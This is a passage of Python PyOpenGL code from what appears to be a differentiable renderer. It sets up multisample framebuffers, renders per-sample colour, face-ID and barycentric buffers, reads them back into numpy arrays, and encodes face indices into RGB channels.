# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1,
0)
self.texture_errors_sample_barycentric2 = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_RG32F, self.frustum['width'], self.frustum['height'], False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2,
0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'],
False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
# Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
# Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location)  # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location)  # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location)  # from 'location = 3' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location)  # from 'location = 4' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh += [vao]
vbo_face_ids_mesh += [vbo_face_ids]
vbo_barycentric_mesh += [vbo_barycentric]
GL.glBindVertexArray(0)
self.vbo_face_ids_list += [vbo_face_ids_mesh]
self.vbo_barycentric_list += [vbo_barycentric_mesh]
self.vao_errors_mesh_list += [vaos_mesh]
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
#ImageGT
GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindImageTexture(1,self.textureGT, 0, GL.GL_FALSE, 0, GL.GL_READ_ONLY, GL.GL_RGBA8)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
GL.glUniform1i(self.textureGTLoc, 1)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert (primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
# Buffers are (nsamples, height, width, channels) to match the read-back image layout.
self.renders = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width']], dtype=np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in np.arange(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# Read back as (height, width); the original reshape used 'height' twice,
# which only works for square viewports.
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT),
np.uint32).reshape(self.frustum['height'], self.frustum['width']).astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate(
[self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:, :, 0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0., 0., 0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
# Finally, resolve the per-sample renders into the output image and mark
# the render and derivatives for recomputation.
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes the camera is set up correctly."""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
# Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f) + 1)
fc = np.tile(fc.reshape((-1, 1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8) & 255
fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
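# A minimal standalone sketch (hypothetical helper names) of the face-ID
# encoding above: 1-based face indices are split into three uint8 channels
# so they survive a round trip through an RGB8 color attachment, with 0
# reserved for "no face".

```python
import numpy as np

def encode_face_ids(n_faces):
    # Face i is stored as id = i + 1 so that 0 can mean "background".
    ids = np.arange(1, n_faces + 1, dtype=np.uint32)
    r = (ids & 255).astype(np.uint8)
    g = ((ids >> 8) & 255).astype(np.uint8)
    b = ((ids >> 16) & 255).astype(np.uint8)
    return np.stack([r, g, b], axis=1)

def decode_face_ids(rgb):
    # Inverse of encode_face_ids: rebuild the 24-bit id from the channels.
    rgb = rgb.astype(np.uint32)
    return rgb[:, 0] | (rgb[:, 1] << 8) | (rgb[:, 2] << 16)
```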
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
